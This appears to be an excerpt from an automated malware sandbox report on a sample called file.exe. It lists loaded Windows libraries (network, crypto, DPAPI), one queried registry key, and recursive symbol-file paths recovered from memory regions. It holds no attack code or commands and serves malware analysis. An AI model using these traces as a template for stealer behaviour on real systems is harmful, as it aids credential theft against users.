          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: drprov.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: winsta.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: ntlanman.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: davclnt.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: davhlpr.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: wkscli.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: cscapi.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: browcli.dll
          Source: C:\Users\user\AppData\Local\57ca6fd8-0917-4862-aa13-c17e22831447\file.exeSection loaded: netapi32.dll
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ta\\Q source: file.exe, 00000007.00000003.2750546305.0000000003126000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2751902769.0000000003129000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2751804217.0000000003127000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\* source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: file.exe, 00000007.00000003.2750642719.000000000372C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2745437449.000000000372C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\*e source: file.exe, 00000007.00000003.2674265194.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2674359164.0000000000934000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639828066.0000000000935000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639636291.000000000092F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2411433716.0000000000931000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.2764248429.0000000000936000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2751614715.0000000000933000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639575185.000000000367F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454741166.000000000362A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639256814.0000000003623000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638801916.0000000003622000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2735033298.000000000310F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2736854100.0000000003113000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: file.exe, 00000007.00000003.2725549066.000000000314C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730153684.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2724350929.0000000003147000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\CskZR source: file.exe, 00000007.00000003.2454804207.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638414568.000000000317A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639138536.0000000003182000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.000000000316A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\:( source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb\q source: file.exe, 00000007.00000003.2639109083.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638556300.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\4 source: file.exe, 00000007.00000003.2673162145.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673632116.0000000003901000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\x\nc\ source: file.exe, 00000007.00000003.2741340154.000000000368C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2673162145.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660040298.000000000374D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2673632116.0000000003901000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\/ source: file.exe, 00000007.00000003.2741597672.0000000003A30000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744837562.0000000003A49000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\\d\$ source: file.exe, 00000007.00000003.2749544594.0000000003189000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741186594.0000000003175000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750832515.0000000003189000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbche\AppCache133409611734040046.txtR source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\k source: file.exe, 00000007.00000003.2736612029.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730941705.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\g source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\M\ts\ source: file.exe, 00000007.00000003.2761328703.0000000003AD6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: file.exe, 00000007.00000003.2672799622.0000000003756000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671298531.0000000003751000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: file.exe, 00000007.00000003.2670677971.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2672571739.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2671990261.00000000035C3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ce\ source: file.exe, 00000007.00000003.2660786899.0000000003612000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2660936222.0000000003626000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2725549066.000000000314C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730153684.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2724350929.0000000003147000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\ source: file.exe, 00000007.00000003.2741186594.0000000003175000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\ source: file.exe, 00000007.00000003.2638711468.0000000003731000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\EdgePushStorageWithWinRt\.pdb\ source: file.exe, 00000007.00000003.2760080871.00000000039D8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\*\*$ source: file.exe, 00000007.00000003.2735635475.0000000003181000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730755035.000000000317A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730153684.0000000003150000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorCache\SettingsCache.txt.watz source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: file.exe, 00000007.00000003.2724576983.0000000003990000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698806550.0000000003989000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696058379.0000000003960000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2698247902.0000000003961000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695973619.000000000361E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003999000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\m( source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: file.exe, 00000007.00000003.2755211411.0000000003AA2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2756609784.0000000003AD3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2750931646.0000000003AFE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.watz source: file.exe, 00000007.00000003.2593813478.000000000317C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000316A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: file.exe, 00000007.00000003.2638999473.00000000035C7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\Q source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\ source: file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638455069.000000000313F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2639171288.0000000003142000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\; source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\434\* source: file.exe, 00000007.00000003.2381853776.0000000000930000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\@ source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2697886616.0000000003791000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2695735716.000000000374C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2696774171.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Z source: file.exe, 00000007.00000003.2454804207.000000000313C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2638362574.0000000003150000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2427038316.000000000313B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2593731037.000000000312B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2454987079.0000000003145000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594175712.0000000003131000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\_ source: file.exe, 00000007.00000003.2755482163.0000000003754000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2755830820.000000000375C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: file.exe, 00000007.00000003.2742668991.0000000003791000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743867571.0000000003799000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ies\& source: file.exe, 00000007.00000003.2671364003.000000000378D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2670719853.000000000376D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*o source: file.exe, 00000007.00000003.2593566372.0000000003606000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2594290640.0000000003612000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: file.exe, 00000007.00000003.2730941705.00000000039B1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2741597672.00000000039B8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2744942555.00000000039C9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2743236831.00000000039B8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\^ source: file.exe, 00000007.00000003.2736612029.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2725574739.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000003.2730941705.0000000003A3A000.00000004.00000020.00020000.00000000.sdmp
